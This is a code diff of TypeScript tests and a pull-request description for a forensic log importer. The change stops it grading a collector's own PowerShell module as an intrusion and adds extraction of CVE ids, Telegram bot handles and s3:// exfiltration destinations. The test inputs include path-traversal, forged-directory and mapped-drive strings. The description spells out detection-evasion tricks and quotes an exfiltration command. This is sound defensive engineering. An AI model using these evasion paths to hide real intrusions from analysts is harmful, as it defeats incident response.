+        Security: { UserID: "S-1-5-18" },
+        TimeCreated: { SystemTime: 1787130561 },
+      },
+      EventData: { MessageNumber: 1, MessageTotal: 8, Path: path, ScriptBlockText: SNIPER_BODY },
+    },
+  });
+
+  it("demotes a HIGH verdict on a script the collector ran out of its own tool tree", () => {
+    const row = pwshRow(COLLECTOR_PSM1, "high", "Potential WinAPI Calls Via PowerShell Scripts");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Info");
+  });
+
+  it("demotes the medium account-sweep verdict from the same module", () => {
+    const row = pwshRow(COLLECTOR_PSM1, "medium", "Powershell LocalAccount Manipulation");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Info");
+  });
+
+  // The demotion is a claim about WHERE the script lives, never about what it contains. The same
+  // body run from anywhere else is the intrusion this rule exists to catch.
+  it("keeps the grade when the identical script ran from a user path", () => {
+    const row = pwshRow(
+      "C:\\Users\\vagrant\\Desktop\\priv.ps1",
+      "high",
+      "Potential WinAPI Calls Via PowerShell Scripts",
+    );
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  // A lone `\sigma\` or `\Tools\tmp` component is a directory anyone can create. Only the collector
+  // ROOT context demotes — the same bar isDetectionToolLocation already sets for THOR and YARA.
+  it("does not demote on a directory name an attacker can choose", () => {
+    const row = pwshRow(
+      "C:\\Users\\v\\sigma\\evil.ps1",
+      "high",
+      "Potential WinAPI Calls Via PowerShell Scripts",
+    );
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  it("leaves a row with no script path alone", () => {
+    const row = pwshRow("", "high", "Potential WinAPI Calls Via PowerShell Scripts");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+});

--- a/companion/tests/analysis/velociraptorImport.test.ts
+++ b/companion/tests/analysis/velociraptorImport.test.ts
@@ -3996,6 +3996,17 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
     ["the simulation-repo name as a folder", "C:\\Users\\v\\Digital-Forensic-Artifacts\\evil.ps1"],
     ["a lone sigma directory", "C:\\Users\\v\\sigma\\evil.ps1"],
     ["ProgramData, which is user-writable by default", "C:\\ProgramData\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+    [
+      "a substituted drive, which needs no admin at all",
+      "Z:\\Program Files\\Velociraptor\\Tools\\tmp1\\x.psm1",
+    ],
+    ["a mapped network drive", "Y:\\Program Files\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+    ["removable media", "E:\\Program Files\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+    [
+      "a traversal back out of the tool tree",
+      "C:\\Program Files\\Velociraptor\\Tools\\..\\..\\..\\Users\\v\\evil.ps1",
+    ],
+    ["an extended-length prefix", "\\\\?\\C:\\Program Files\\Velociraptor\\Tools\\tmp1\\x.psm1"],
   ])("does not demote a High from %s", (_label, path) => {
     const row = pwshRow(path, "high", "Potential WinAPI Calls Via PowerShell Scripts");
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
@@ -4019,6 +4030,24 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
       "Potential WinAPI Calls Via PowerShell Scripts",
     );
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  it("accepts the forward-slash spelling of the same install path", () => {
+    const row = pwshRow(
+      "C:/Program Files/Velociraptor/Tools/tmp1/PersistenceSniper/PersistenceSniper.psm1",
+      "high",
+      "Potential WinAPI Calls Via PowerShell Scripts",
+    );
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Info");
+  });
+
+  // A hard ceiling that does not depend on the path logic being perfect. A Critical is a rule that
+  // named a specific technique — the strongest verdict the pack produces — so no location argument
+  // may erase it. It also bounds the worst case if the path check is ever wrong again: an attacker
+  // who already holds admin on the collector's install path can quiet a High, never a Critical.
+  it("never lowers a Critical, even from the genuine collector tool tree", () => {
+    const row = pwshRow(COLLECTOR_PSM1, "critical", "Invoke-Mimikatz Execution");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Critical");
   });
 
   it("leaves a row with no script path alone", () => {


### PR DESCRIPTION
Two precision fixes from a three-way comparison of case INC-2026-019 (Bissa scanner simulation) against the ground-truth repo and a second vendor's report on the same evidence.

## 1. The collector was reported as the intrusion

`Windows.Forensics.PersistenceSniper` runs `PersistenceSniper.psm1` as SYSTEM out of Velociraptor's own unpacked tool tree. That module calls `AdjustTokenPrivileges` and sweeps local accounts because those are the techniques it *detects* — and broad Sigma rules grade it `Potential WinAPI Calls Via PowerShell Scripts` (High) exactly as they would an intruder's.

On the real collection synthesis read that burst as a WinPwn/Mimikatz credential-access intrusion and made it **the case's only Critical finding** — ranked above the offensive tool the analyst was actually hunting. It also cited the module's PSScriptInfo GUID as belonging to WinPwn; it belongs to PersistenceSniper, a defensive DFIR module.

`isDetectionToolScript` grades a 4104 row on `EventData.Path` — the engine's own view of the file it compiled, not a string the script can talk about. Unlike `isGeneratedModuleScript` it may lower a High, because the finding it kills *was* a High. The identical script body run from a user path keeps its grade.

### Why it does not reuse `isDetectionToolLocation`

A stop-time review caught the first version of this doing exactly what it exists to prevent, in reverse. `isDetectionToolLocation` matches a bare `\Velociraptor\` path component — right for the THOR and YARA callers, whose hits come from sweeping the collector's real install, wrong for a 4104 `EventData.Path`, which points wherever the **attacker** put their script. `C:\Users\v\Velociraptor\evil.ps1`, a forged tool tree under `AppData`, an attacker-controlled UNC share, `C:\ProgramData\Velociraptor\...`, or a folder simply named `EVTX-ATTACK-SAMPLES` all suppressed a High. Since this is the one call site allowed to lower a High or Critical, that was a way to hide a finding by choosing a directory name — the weakness #720 records for those markers.

Three review passes landed on the same conclusion: **a path cannot carry this claim.** `\Velociraptor\` is a directory anyone can create. Pinning the drive letter does not help either — `subst Z: C:\Users\v\evil` and `net use Y: \\attacker\share` cost no privilege, and no hard-coded letter can tell you the *evidence host's* system drive, so "Program Files is admin-only" was an assumption about a filesystem this process never sees.

So the check stopped asking the path to prove privilege and asked the field the attacker cannot supply:

- **the logged identity** — PowerShell records the account the *engine* ran under. A script is logged as `S-1-5-18` only if it actually ran as SYSTEM. This also closes the drive-letter hole without guessing anything: `subst` and `net use` mappings are per-logon-session, so a SYSTEM process never sees the volume an unprivileged user mapped.
- **the tool tree** — now corroboration rather than the load-bearing part, so the drive letter is back to `[a-z]:`. Traversal is still refused: a prefix match on a path holding `..` describes nothing.
- **a ceiling** — the demotion will not lower a **Critical**. That holds whether or not the reasoning above is right. The most a bypass buys is quieting a High, which an attacker already at SYSTEM has far better ways to achieve.

`logonSid` reads the three shapes this importer sees: DetectRaptor Evtx's flat `UserSID`, Chainsaw's `SystemData.Security_attributes.UserID`, and native EVTX `System.Security.UserID` with or without an `Event` wrapper. Both sources carrying the real rows supply `S-1-5-18`, so the new condition costs nothing on real data.

Sixteen adversarial cases cover it — every attacker-writable path under a normal user SID, the genuine install path under a normal user SID, SYSTEM outside the tool tree, traversal, and the Critical ceiling.

## 2. The whole campaign sat unread in one script block

Both target CVEs, both operator bot handles, the exfil bucket and the acquirer domains arrived in a **single** 4104 script block. `extractDomains` (#648) caught the domains. Everything else was read by the importer and dropped, so no report named the vulnerability being exploited or the channel hits were reported on.

Three additions to `scrapeText`:

- **CVE ids**, canonicalized to upper case. The `CVE-` prefix carries the match, so a bare `2025-55182` stays a build number.
- **Telegram bot handles**, in both forms a script writes one. Telegram requires a bot username to end in `bot`, so the suffix is the platform's rule rather than a guess. The `@`-prefixed form needs only a legal username; the *assigned* form (`AlertBotUsername = "bissapwned_bot"`) — which is what the real block used, with no `@` anywhere — additionally requires the key to name a bot and 9+ characters of value. Both normalize to `@handle`, so one bot is one indicator.
- **`s3://` destinations**. `TEXT_URL` only reads http(s), so an exfil runner's `aws s3 cp results/*.zip s3://bucket/prefix/` reached no scraper at all.

## Verified against the real collection

| | before | after |
|---|---|---|
| 09:09 PersistenceSniper burst | High + Medium → drove the Critical | **17 events, all Info** |
| `CVE-2025-55182`, `CVE-2025-9501` | not extracted | **extracted** |
| `@bissapwned_bot`, `@bissa_scan_bot` | not extracted | **extracted** |
| Bissa script block's own grade | Medium | **Medium (unchanged)** |

## Gates

`typecheck`, `lint`, `test` (11,158 passed), `check:size`, `check:boundaries`, `check:imports`, prettier — all green. 31 new tests, written RED first.


